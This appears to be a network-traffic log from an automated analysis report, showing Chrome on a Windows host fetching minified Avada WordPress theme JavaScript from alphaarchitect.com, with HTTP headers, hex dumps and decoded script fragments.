                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-19c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1f0b2f43ef-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC419INData Raw: 31 39 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 66 6f 6f 74 65 72 20 2e 66 75 73 69 6f 6e 2d 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 66 75 73 69 6f 6e 2d 63 6f 6c 75 6d 6e 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 73 28 22 3a 65 6d 70 74 79 22 29 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 22 2c 22 30 22 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 66 6f 6f 74 65 72 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 73 6f 63 69 61 6c 2d 6e 65 74 77 6f 72 6b
                                                                                                                                                                                                                                                                        Data Ascii: 19cjQuery(document).ready(function(){jQuery(".fusion-footer .fusion-footer-widget-area .fusion-column").each(function(){jQuery(this).is(":empty")&&jQuery(this).css("margin-bottom","0")}),jQuery(".fusion-social-links-footer").find(".fusion-social-network
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        117192.168.2.449875141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC824OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-806"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2018780f7d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC878INData Raw: 38 30 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 76 61 64 61 41 64 64 51 75 61 6e 74 69 74 79 42 6f 78 65 73 28 74 2c 61 29 7b 76 61 72 20 65 3d 21 31 2c 6e 3d 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 77 63 6f 70 63 2d 70 72 6f 64 75 63 74 2d 73 69 6e 67 6c 65 22 29 3b 74 7c 7c 28 74 3d 22 2e 71 74 79 22 29 2c 61 7c 7c 28 61 3d 6a 51 75 65 72 79 28 22 64 69 76 2e 71 75 61 6e 74 69 74 79 3a 6e 6f 74 28 2e 62 75 74 74 6f 6e 73 5f 61 64 64 65 64 29 2c 20 74 64 2e 71 75 61 6e 74 69 74 79 3a 6e 6f 74 28 2e 62 75 74 74 6f 6e 73 5f 61 64 64 65 64 29 22 29 2e 66 69 6e 64 28 74 29 29 2c 61 2e 6c 65 6e 67 74 68 26 26 28 6a 51 75 65 72 79 2e 65 61 63 68 28 61 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 22 64 61 74 65 22 3d 3d 3d 6a 51
                                                                                                                                                                                                                                                                        Data Ascii: 806function avadaAddQuantityBoxes(t,a){var e=!1,n=jQuery("body").hasClass("wcopc-product-single");t||(t=".qty"),a||(a=jQuery("div.quantity:not(.buttons_added), td.quantity:not(.buttons_added)").find(t)),a.length&&(jQuery.each(a,function(t,a){"date"===jQ
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1183INData Raw: 2c 20 2e 6d 69 6e 75 73 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 74 29 2c 65 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 76 61 6c 28 29 29 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 61 74 74 72 28 22 6d 61 78 22 29 29 2c 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 2c 75 3d 61 2e 61 74 74 72 28 22 73 74 65 70 22 29 3b 65 26 26 22 22 21 3d 3d 65 26 26 22 4e 61 4e 22 21 3d 3d 65 7c 7c 28 65 3d 30 29 2c 22 22 21 3d 3d 69 26 26 22 4e 61 4e 22 21 3d 3d 69 7c 7c 28 69 3d 22 22 29 2c 22 22 21 3d 3d 6f 26 26 22 4e 61 4e 22 21 3d 3d 6f 7c 7c 28 6f 3d 30 29 2c 22 61 6e 79 22 21 3d 3d 75 26 26 22
                                                                                                                                                                                                                                                                        Data Ascii: , .minus").on("click",function(){var a=jQuery(this).parent().find(t),e=parseFloat(a.val()),i=parseFloat(a.attr("max")),o=parseFloat(a.attr("min")),u=a.attr("step");e&&""!==e&&"NaN"!==e||(e=0),""!==i&&"NaN"!==i||(i=""),""!==o&&"NaN"!==o||(o=0),"any"!==u&&"
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        118192.168.2.449877141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC624OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-3524"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2109d24363-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC877INData Raw: 33 35 32 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 53 63 72 6f 6c 6c 28 29 7b 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 54 6f 70 3d 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 2c 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 4c 65 66 74 3d 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 66 75 73 69 6f 6e 50 61 72 61 6c 6c 61 78 41 6c 6c 28 29 7b 76 61 72 20 74 3b 66 6f 72 28 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 53 63 72 6f 6c 6c 28 29 2c 74 3d 30 3b 74 3c 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d
                                                                                                                                                                                                                                                                        Data Ascii: 3524function _fusionRefreshScroll(){window._fusionScrollTop=window.pageYOffset,window._fusionScrollLeft=window.pageXOffset}function _fusionParallaxAll(){var t;for(_fusionRefreshScroll(),t=0;t<window._fusionImageParallaxImages.length;t++)window._fusionIm
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7d 29 7d 28 77 69 6e 64 6f 77 29 2c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 26 26 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 3d 5b 5d 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 65 3d 22 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: celAnimationFrame=function(t){clearTimeout(t)}),"function"==typeof define&&define(function(){return t.requestAnimationFrame})}(window),void 0===window._fusionImageParallaxImages&&(window._fusionImageParallaxImages=[]),function(t,i){var e="fusionImageParal
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 28 74 68 69 73 29 2c 6a 51 75 65 72 79 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 61 74 74 72 28 22 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 2d 69 6e 64 65 78 22 2c 65 2d 31 29 2c 74 68 69 73 2e 73 65 74 75 70 28 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 6f 6d 70 6c 65 74 65 28 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3d 30 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 48 65 69 67 68 74 3d 30 7d 2c 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 21 31 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 65 6d 6f 76 65 4f 72 69 67 26 26 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 2c 64 6f 50 61 72
                                                                                                                                                                                                                                                                        Data Ascii: (this),jQuery(this.element).attr("data-parallax-index",e-1),this.setup(),this.settings.complete(),this.containerWidth=0,this.containerHeight=0},setup:function(){!1!==this.settings.removeOrig&&t(this.element).remove(),this.resizeParallaxBackground()},doPar
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 73 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 22 29 26 26 28 22 64 6f 77 6e 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3e 61 3f 61 3d 30 3a 22 75 70 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3c 61 3f 61 3d 30 3a 22 72 69 67 68 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3e 61 3f 61 3d 30 3a 22 6c 65 66 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3c 61 26 26 28 61 3d 30 29 29 2c 22 66 69 78 65 64 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 28 22 6c 65 66 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e
                                                                                                                                                                                                                                                                        Data Ascii: s("background-repeat")&&("down"===this.settings.direction&&0>a?a=0:"up"===this.settings.direction&&0<a?a=0:"right"===this.settings.direction&&0>a?a=0:"left"===this.settings.direction&&0<a&&(a=0)),"fixed"===this.settings.direction||("left"===this.settings.
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 62 6c 65 6e 64 4d 6f 64 65 53 6d 61 6c 6c 26 26 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 22 2b 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 2b 22 70 78 29 22 29 26 26 28 65 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 6c 65 6e 64 4d 6f 64 65 53 6d 61 6c 6c 29 2c 74 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 3a 73 2c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 62 6c 65 6e 64 2d 6d 6f 64 65 22 3a 65 7d 29 2c 22 22 21 3d 3d 69 26 26 74 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 22 62 61 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: blendModeSmall&&Modernizr.mq("only screen and (max-width: "+fusionJSVars.visibility_small+"px)")&&(e=this.settings.blendModeSmall),t.find(".parallax-inner").css({"background-color":s,"background-blend-mode":e}),""!==i&&t.find(".parallax-inner").css({"back
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 6f 74 74 6f 6d 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 61 6c 69 67 6e 26 26 28 61 3d 22 35 30 25 20 31 30 30 25 22 29 2c 63 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 63 6f 76 65 72 22 2c 62 61 63 6b 67 72 6f 75 6e 64 41 74 74 61 63 68 6d 65 6e 74 3a 22 73 63 72 6f 6c 6c 22 2c 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3a 61 2c 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3a 22 6e 6f 2d 72 65 70 65 61 74 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65
                                                                                                                                                                                                                                                                        Data Ascii: ottom"===this.settings.align&&(a="50% 100%"),c.css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),backgroundSize:"cover",backgroundAttachment:"scroll",backgroundPosition:a,backgroundRepeat:"no-repeat"}),""!==this.settings.image&&"none"!==this.se
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 73 65 74 74 69 6e 67 73 2e 78 70 6f 73 2b 22 20 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 79 70 6f 73 2c 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3a 74 3f 22 72 65 70 65 61 74 22 3a 22 6e 6f 2d 72 65 70 65 61 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 74 3f 22 61 75 74 6f 22 3a 22 63 6f 76 65 72 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 28 63 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c
                                                                                                                                                                                                                                                                        Data Ascii: settings.xpos+" "+this.settings.ypos,backgroundRepeat:t?"repeat":"no-repeat",backgroundSize:t?"auto":"cover"}),""!==this.settings.image&&"none"!==this.settings.image&&(c.find(".parallax-inner").css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 65 72 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 28 63 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3a 75 3f 22 22 3a 22 75 72 6c 28 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 2b 22 29 22 7d 29 2c 74 68 69 73 2e 73 65 74 42 61 63 6b 67 72 6f 75 6e 64 53 74 79 6c 69 6e 67 28 63 2c 6d 29 29 2c 64 3d 30 2c 63 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 3e
                                                                                                                                                                                                                                                                        Data Ascii: er"}),""!==this.settings.image&&"none"!==this.settings.image&&(c.find(".parallax-inner").css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),backgroundImage:u?"":"url("+this.settings.image+")"}),this.setBackgroundStyling(c,m)),d=0,c.offset().top>
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 29 7d 2c 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 57 69 6e 64 6f 77 28 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 29 7d 2c 31 30 30 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69
                                                                                                                                                                                                                                                                        Data Ascii: mages,function(t,i){i.resizeParallaxBackground()})},1),setTimeout(function(){_fusionRefreshWindow(),jQuery.each(window._fusionImageParallaxImages,function(t,i){i.resizeParallaxBackground()})},100),jQuery.each(window._fusionImageParallaxImages,function(t,i
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 22 29 3a 22 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 4d 65 64 69 75 6d 3a 76 6f 69 64 20 30 21 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 6d 65 64 69 75 6d 22 29 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 6d 65 64 69 75 6d 22 29 3a 22 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 53 6d 61 6c 6c 3a 76 6f 69 64 20 30 21 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 73 6d 61 6c 6c 22 29 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 73 6d 61 6c 6c 22 29 3a 22 22 2c 62 6c 65 6e 64 4d 6f 64 65 3a 76
                                                                                                                                                                                                                                                                        Data Ascii: uery(this).data("bg-color"):"",backgroundColorMedium:void 0!==jQuery(this).data("bg-color-medium")?jQuery(this).data("bg-color-medium"):"",backgroundColorSmall:void 0!==jQuery(this).data("bg-color-small")?jQuery(this).data("bg-color-small"):"",blendMode:v


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        119192.168.2.449876141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC615OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
